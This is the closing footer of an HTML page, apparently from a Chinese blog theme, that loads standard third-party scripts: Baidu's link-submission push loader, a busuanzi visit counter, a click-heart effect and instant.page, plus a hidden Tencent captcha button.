        <button id="TencentCaptcha" data-appid="xxxxxxxxxx" data-cbfn="callback" type="button" hidden></button>
    

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    <!--腾讯兔小巢-->
    
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

</body>

</html>
